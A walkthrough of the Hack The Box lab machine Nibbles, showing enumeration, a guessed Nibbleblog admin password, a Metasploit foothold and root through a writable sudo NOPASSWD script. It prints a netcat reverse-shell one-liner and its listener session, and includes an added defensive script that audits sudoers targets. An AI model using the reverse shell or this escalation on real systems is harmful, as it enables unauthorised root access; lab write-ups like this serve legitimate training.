Redhalo

Hack The Box walkthrough – Nibbles machine

Here we go again with a new walkthrough for the Hack The Box machine Nibbles!

It is an easy Linux machine created by mrb3n at the beginning of 2018.

Let’s jump in!

Enumeration

As usual, we start with our nmap enumeration scan to find out what we are dealing with:

[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.69.238
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-18 17:54 EST
Nmap scan report for 10.129.69.238
Host is up (0.035s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds

I first checked port 80, on which an Apache web server is listening:

Looking at the source code, I found a comment revealing that a /nibbleblog/ directory exists.

It brought me to a Nibbleblog CMS blog.

I found the Nibbleblog source code on GitHub, which let me dig up interesting information about our target.

First, the page update.php displays the installed version:

Second, in config.xml I discovered a potential admin user:

Third, the file users.xml showed me that there is a sort of IP blacklist after 5 unsuccessful login attempts:

That means no brute force. Let’s try to log in with a bit of guesswork then.

The login page is admin.php, and I simply tried the user found in config.xml, “admin”, with a keyword found on the blog.

Bingo with admin / nibbles!

FOOTHOLD

Looking for an exploit with searchsploit, I then found one matching our version that can be used with Metasploit:

Let’s give it a try:

Bingo! We have our shell!

PRIVILEGE ESCALATION

Looking in the /home/nibbler folder, I found an archive, personal.zip, and unzipped it with the following command:

nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip  user.txt
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh 

It looks like a legitimate script that prints basic information about the host:

Internet:  Disconnected
Operating System Type :  GNU/Linux
OS Name : Ubuntu
UBUNTU_CODENAME=xenial
OS Version : 16.04.3 LTS (Xenial Xerus)
Architecture :  x86_64
Kernel Release :  4.4.0-104-generic
Hostname :  Nibbles
Internal IP :  10.129.69.238 dead:beef::250:56ff:feb9:92f9
External IP :  
Name Servers :  DO 1.1.1.1 8.8.8.8
Logged In users : 
Ram Usages : 
              total        used        free      shared  buff/cache   available
Mem:           974M        231M        226M         10M        516M        560M
Swap Usages : 
              total        used        free      shared  buff/cache   available
Swap:          1.0G          0B        1.0G
Disk Usages : 
Filesystem                    Size  Used Avail Use% Mounted on
/dev/sda1                     472M  133M  330M  29% /boot
Load Average :  0.00,0.00,0.00
System Uptime Days/(HH:MM) :  2:10

Running sudo -l then showed that I can execute this script with root permissions without a password:

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
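The sudoers line above is the actual root cause: the NOPASSWD target lives in a directory the unprivileged user controls, so what the script currently contains is irrelevant. The following shell script is an added audit example (not part of this walkthrough, nor anything shipped on the box): for each NOPASSWD command it walks from the command file up the directory chain and flags the first component owned by someone other than the trusted owner or writable by group/other. The scratch tree, the two sudoers lines and the hardened /usr/local/sbin location are constructed for the demo; since a demo cannot chown files, the user-controlled directory is modelled as world-writable and the current uid is passed as the trusted owner. It relies on GNU or busybox `stat -c`.

```shell
#!/bin/sh
# Added audit example, not part of the walkthrough. Flags sudo NOPASSWD targets
# that someone other than the trusted owner (root, uid 0, by default) could
# replace: the file itself, or any directory on the way to it, being owned by
# another uid or carrying a group/other write bit. Needs GNU or busybox `stat -c`.

# path_is_tamperable PATH [TRUSTED_UID]
# Returns 0 (true) if PATH is owned by a uid other than TRUSTED_UID or has a
# write bit set for group or other; returns 1 otherwise (also for missing paths).
path_is_tamperable() {
    f=$1
    t=${2:-0}
    owner=$(stat -c %u "$f" 2>/dev/null) || return 1
    mode=$(stat -c %a "$f")
    [ "$owner" != "$t" ] && return 0
    others=${mode#"${mode%?}"}      # last octal digit: other
    rest=${mode%?}
    group=${rest#"${rest%?}"}       # second to last digit: group
    case "$group$others" in
        *[2367]*) return 0 ;;       # 2, 3, 6 and 7 all include the write bit
    esac
    return 1
}

# check_sudo_target CMD [TRUSTED_UID] [STOP_DIR]
# Walks from CMD up to (not including) STOP_DIR, default /, and prints
# "UNSAFE <component>" for the first tamperable path (returns 1) or "OK" (returns 0).
check_sudo_target() {
    p=$1
    trusted=${2:-0}
    stop=${3:-/}
    while [ "$p" != "$stop" ] && [ "$p" != "/" ]; do
        if path_is_tamperable "$p" "$trusted"; then
            echo "UNSAFE $p"
            return 1
        fi
        p=$(dirname "$p")
    done
    echo OK
    return 0
}

# audit_sudoers FILE [TRUSTED_UID] [STOP_DIR]
# Extracts every command path after "NOPASSWD:" in FILE (comma separated,
# arguments dropped) and checks each one; returns 1 if any is UNSAFE.
audit_sudoers() {
    file=$1
    trusted=${2:-0}
    stop=${3:-/}
    rc=0
    for cmd in $(grep 'NOPASSWD:' "$file" | sed 's/.*NOPASSWD:[[:space:]]*//' |
                 tr ',' '\n' | awk '{print $1}'); do
        case $cmd in /*) ;; *) continue ;; esac    # skip ALL and Cmnd_Aliases
        printf '%s: ' "$cmd"
        check_sudo_target "$cmd" "$trusted" "$stop" || rc=1
    done
    return $rc
}

# make_demo_tree
# Constructed scratch copy of the box's layout. On the real box /home/nibbler is
# owned by nibbler; the demo cannot chown, so the user-controlled directory is
# modelled as world-writable instead. Prints the temp root.
make_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/home/nibbler/personal/stuff" "$root/usr/local/sbin"
    printf '#!/bin/bash\ndf -h\n' > "$root/home/nibbler/personal/stuff/monitor.sh"
    cp "$root/home/nibbler/personal/stuff/monitor.sh" "$root/usr/local/sbin/monitor.sh"
    chmod 755 "$root/home" "$root/home/nibbler" "$root/home/nibbler/personal" \
              "$root/usr" "$root/usr/local" "$root/usr/local/sbin" \
              "$root/home/nibbler/personal/stuff/monitor.sh" "$root/usr/local/sbin/monitor.sh"
    chmod 777 "$root/home/nibbler/personal/stuff"      # the tamperable component
    printf 'nibbler ALL=(root) NOPASSWD: %s\n' \
        "$root/home/nibbler/personal/stuff/monitor.sh" > "$root/sudoers.bad"
    printf 'nibbler ALL=(root) NOPASSWD: %s\n' \
        "$root/usr/local/sbin/monitor.sh" > "$root/sudoers.good"
    echo "$root"
}

# Stand-alone run. The demo passes the current uid as the trusted owner because
# it cannot create root-owned files; a real audit passes 0 or omits the argument.
r=$(make_demo_tree)
me=$(id -u)
audit_sudoers "$r/sudoers.bad" "$me" "$r" || echo "-> misconfigured: a NOPASSWD target can be replaced"
audit_sudoers "$r/sudoers.good" "$me" "$r" && echo "-> hardened layout: OK"
rm -rf "$r"
```

The fix the audit points at is the one the hardened line models: keep the script in a root-owned, owner-writable-only location such as /usr/local/sbin, and point the sudoers entry there. Run against the real /etc/sudoers with the defaults (trusted uid 0, stop directory /) so that world-writable parents such as /tmp are caught as well.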

Well, let’s edit the script to run a reverse shell with root rights.

I checked which nc version is installed on the target and built my command accordingly for OpenBSD netcat (its usage output lists no -e option, hence the mkfifo variant):

which nc
/bin/nc
nc -h
OpenBSD netcat (Debian patchlevel 1.105-7ubuntu1)
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
          [-P proxy_username] [-p source_port] [-q seconds] [-s source]
          [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
          [-x proxy_address[:port]] [destination] [port]
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

I then started a listener on my Kali machine and ran the script with the command:

nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh

Then I was root!

[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.105] from (UNKNOWN) [10.129.69.238] 32856
# whoami
root
# cd /root
# ls
root.txt